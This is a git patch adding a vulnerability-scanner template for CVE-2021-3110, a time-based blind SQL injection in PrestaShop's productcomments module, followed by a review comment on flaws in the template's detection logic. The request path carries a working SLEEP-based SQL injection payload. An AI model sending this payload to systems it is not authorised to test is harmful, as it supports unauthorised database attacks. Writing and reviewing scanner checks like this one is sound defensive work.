From 72c56e0ff027d99b29de25ea65cd66aaca6ae555 Mon Sep 17 00:00:00 2001
From: jaimin4949 <62239432+jaimin4949@users.noreply.github.com>
Date: Thu, 18 Feb 2021 01:57:08 +0530
Subject: [PATCH] CVE-2021-3110 Blind Sqli
---
cves/2021/CVE-2021-3110.yaml | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 cves/2021/CVE-2021-3110.yaml
diff --git a/cves/2021/CVE-2021-3110.yaml b/cves/2021/CVE-2021-3110.yaml
new file mode 100644
index 0000000000..5f693d7800
--- /dev/null
+++ b/cves/2021/CVE-2021-3110.yaml
@@ -0,0 +1,24 @@
+id: cve-2021-3110
+
+info:
+ name: prestshop CMS SQL Injection
+ author: Jaimin Gondaliya
+ severity: high
+ description: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
+
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "average_grade"
+ - "1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)"
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
\ No newline at end of file
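Review bot: The matchers never measure response time, so the `SLEEP(5)` in the request path contributes nothing to detection: a hit is declared when the body contains `average_grade` and the decoded payload string with status 200, which appears to show only that the parameter is echoed back, not that it reached the database. That can flag hosts that reflect `id_products[]` without being injectable, while every scan still makes the target hold a query for five seconds. Either add a time-based condition (for example a `dsl` matcher with `duration>=5`, if the engine version in use supports it) or drop the sleep and state in `description` that the check is reflection-based. Smaller points: `name` spells the product `prestshop`, `description` says `id_product` while the request uses `id_products[]`, the `id` is lower-case while the file name is upper-case, and the file ends without a trailing newline.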